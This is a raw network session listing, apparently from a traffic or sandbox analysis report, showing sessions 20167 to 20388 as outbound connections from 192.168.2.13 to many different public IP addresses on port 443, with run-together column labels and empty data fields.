                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20167192.168.2.134666253.109.229.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20168192.168.2.136093814.193.174.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20169192.168.2.133929896.0.60.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20170192.168.2.1342706108.48.19.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20171192.168.2.135785838.251.204.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20172192.168.2.13402201.39.250.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20173192.168.2.134052497.154.18.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20174192.168.2.133803223.116.225.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20175192.168.2.135777077.54.116.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20176192.168.2.133934282.251.231.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20177192.168.2.134614832.73.225.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20178192.168.2.134197486.110.236.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20179192.168.2.1353376117.178.136.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20180192.168.2.135394271.101.64.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20181192.168.2.134185878.148.87.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20182192.168.2.135437078.238.64.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20183192.168.2.1334154179.70.248.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20184192.168.2.1344526189.166.105.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20185192.168.2.1344186156.91.211.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20186192.168.2.135783889.171.239.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20187192.168.2.1344738189.46.217.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20188192.168.2.134583231.191.210.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20189192.168.2.133298861.37.54.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20190192.168.2.1344120207.59.53.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20191192.168.2.1347048144.220.46.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192192.168.2.1335920131.117.245.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20193192.168.2.1344872163.21.151.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20194192.168.2.1334660182.106.138.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20195192.168.2.135964832.155.87.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20196192.168.2.134663845.152.63.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20197192.168.2.1340098219.0.109.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20198192.168.2.1346074163.198.87.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20199192.168.2.1336490207.23.142.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20200192.168.2.1353376152.69.67.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20201192.168.2.1345056212.12.6.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20202192.168.2.1337700118.231.74.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20203192.168.2.1344980194.219.184.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20204192.168.2.135244650.252.254.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20205192.168.2.13574424.252.173.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20206192.168.2.1347664212.147.28.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20207192.168.2.1335770203.204.27.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20208192.168.2.1333730176.112.134.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20209192.168.2.134093695.233.77.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20210192.168.2.135246086.201.248.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20211192.168.2.1359538183.33.86.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20212192.168.2.1336794164.26.57.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20213192.168.2.1340372101.66.191.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20214192.168.2.13422842.25.76.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20215192.168.2.133759465.3.137.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20216192.168.2.1346246134.235.187.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20217192.168.2.1343152202.54.235.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20218192.168.2.1342900160.104.177.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20219192.168.2.1354960121.3.86.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20220192.168.2.1358598118.1.106.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20221192.168.2.1352030107.234.175.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20222192.168.2.1345576216.180.95.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20223192.168.2.1337526216.144.85.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20224192.168.2.1338802155.202.40.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20225192.168.2.1354408187.89.70.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20226192.168.2.1339544154.185.205.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20227192.168.2.1339472100.129.153.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20228192.168.2.1358462202.158.36.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20229192.168.2.133864638.216.12.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20230192.168.2.134077265.222.199.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20231192.168.2.134437640.79.98.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20232192.168.2.1360774171.120.212.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20233192.168.2.134238838.251.138.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20234192.168.2.134423837.183.245.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20235192.168.2.1333264213.250.107.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20236192.168.2.135313014.138.211.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20237192.168.2.135159684.207.178.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20238192.168.2.13599082.143.67.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20239192.168.2.135786688.104.194.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20240192.168.2.134284493.3.98.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20241192.168.2.1351348142.92.19.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20242192.168.2.1334812183.239.230.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20243192.168.2.135059846.131.190.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20244192.168.2.134542087.190.124.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20245192.168.2.134165893.229.123.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20246192.168.2.1343606173.94.85.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20247192.168.2.1341102196.223.198.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20248192.168.2.1357048152.177.134.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20249192.168.2.133344881.116.178.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20250192.168.2.134238496.154.189.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20251192.168.2.135856823.141.131.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20252192.168.2.133835423.17.113.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20253192.168.2.1333710119.41.159.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20254192.168.2.1357760211.58.130.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20255192.168.2.1335958188.150.116.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20256192.168.2.133864620.143.63.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20257192.168.2.1359866123.244.27.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20258192.168.2.1336970187.231.148.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20259192.168.2.1340428101.25.242.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20260192.168.2.1358060152.179.152.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20261192.168.2.134872044.229.132.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20262192.168.2.135779868.153.227.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20263192.168.2.135369281.220.219.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20264192.168.2.1347368183.51.181.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20265192.168.2.134153414.93.88.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20266192.168.2.1352350212.228.89.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20267192.168.2.135632885.241.140.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20268192.168.2.1358792118.192.203.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20269192.168.2.1344766145.242.99.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20270192.168.2.1346044106.5.0.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20271192.168.2.1349752201.86.135.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20272192.168.2.1356482162.209.23.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20273192.168.2.135395639.252.99.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20274192.168.2.1343400145.128.11.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20275192.168.2.1343130153.247.76.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20276192.168.2.135903097.198.0.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20277192.168.2.134104095.242.131.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20278192.168.2.1351304102.113.133.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20279192.168.2.1351654128.55.72.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20280192.168.2.133999079.141.172.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20281192.168.2.135969443.19.216.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20282192.168.2.135607059.110.212.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20283192.168.2.1354200103.146.0.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20284192.168.2.134833659.197.213.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20285192.168.2.1338142130.223.11.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20286192.168.2.133528612.177.34.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20287192.168.2.1358092128.44.209.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20288192.168.2.1357922161.158.20.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20289192.168.2.1354302218.108.119.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20290192.168.2.133350840.152.93.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20291192.168.2.1356164170.250.69.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20292192.168.2.133704898.229.190.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20293192.168.2.133326651.232.235.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20294192.168.2.1354274206.100.190.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20295192.168.2.134560859.228.187.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20296192.168.2.1355246121.169.27.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20297192.168.2.1341562148.208.55.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20298192.168.2.1336446104.234.254.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20299192.168.2.1348798211.11.64.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20300192.168.2.1345144132.73.188.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20301192.168.2.1351190200.175.68.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20302192.168.2.135009242.160.247.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20303192.168.2.134603297.192.136.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20304192.168.2.1333642146.138.238.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20305192.168.2.1344694162.98.32.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20306192.168.2.133439253.175.7.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20307192.168.2.134264261.206.202.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20308192.168.2.136085889.189.5.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20309192.168.2.134935092.226.92.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20310192.168.2.1345016205.243.85.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20311192.168.2.1337156189.100.251.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20312192.168.2.133837069.150.119.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20313192.168.2.1358134119.193.227.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20314192.168.2.133355275.102.124.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20315192.168.2.133827282.60.68.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20316192.168.2.1340700154.253.141.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20317192.168.2.1351866201.58.23.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20318192.168.2.13452609.1.197.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20319192.168.2.1341512203.4.0.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20320192.168.2.1338180182.246.139.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20321192.168.2.1347212172.235.121.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20322192.168.2.134902460.29.185.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20323192.168.2.1339560192.189.105.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20324192.168.2.134597819.14.66.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20325192.168.2.135820678.62.192.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20326192.168.2.1356330223.192.161.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20327192.168.2.134263669.43.251.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20328192.168.2.1333248134.58.61.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20329192.168.2.1354258185.3.136.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20330192.168.2.1357822138.81.135.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20331192.168.2.135787871.153.162.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20332192.168.2.134028040.195.217.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20333192.168.2.1357828154.211.241.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20334192.168.2.1344240181.53.253.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20335192.168.2.1339434188.36.69.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20336192.168.2.1341474183.1.20.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20337192.168.2.1349184118.61.83.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20338192.168.2.1337956115.195.121.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20339192.168.2.133319878.26.171.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20340192.168.2.1333420154.21.174.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20341192.168.2.133509414.58.232.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20342192.168.2.1348784143.126.4.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20343192.168.2.1357408133.75.147.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20344192.168.2.1359920190.60.214.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20345192.168.2.1354734221.187.232.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20346192.168.2.135308059.138.100.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20347192.168.2.1354714208.28.37.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20348192.168.2.1337302186.71.116.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20349192.168.2.1341264174.220.148.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20350192.168.2.134505274.103.60.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20351192.168.2.1349282139.188.240.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20352192.168.2.1349946169.143.174.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20353192.168.2.1335496147.10.108.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20354192.168.2.1338906157.56.81.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20355192.168.2.1359066111.40.94.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20356192.168.2.133605670.110.159.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20357192.168.2.134531652.77.45.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20358192.168.2.1347604142.211.54.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20359192.168.2.133753413.203.11.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20360192.168.2.133317677.238.142.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20361192.168.2.1339522150.244.146.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20362192.168.2.133964850.170.251.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20363192.168.2.1358776137.226.119.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20364192.168.2.136045484.29.83.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20365192.168.2.133705860.27.49.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20366192.168.2.135440239.120.177.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20367192.168.2.135802248.9.77.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20368192.168.2.134857423.97.213.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20369192.168.2.134971677.26.153.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20370192.168.2.1357848176.207.134.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20371192.168.2.133431870.152.232.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20372192.168.2.1358204175.202.237.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20373192.168.2.1354992212.190.188.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20374192.168.2.135340462.218.19.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20375192.168.2.133454260.238.96.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20376192.168.2.1340832191.97.9.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20377192.168.2.135994884.189.102.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20378192.168.2.134826253.220.147.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20379192.168.2.133936045.171.55.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20380192.168.2.135308257.73.22.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20381192.168.2.135523653.92.66.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20382192.168.2.134000265.155.45.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20383192.168.2.1340258113.23.170.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20384192.168.2.1334360117.77.255.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20385192.168.2.134079663.36.250.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20386192.168.2.134854027.132.206.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20387192.168.2.1348396181.135.82.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20388192.168.2.1338764165.208.251.214443
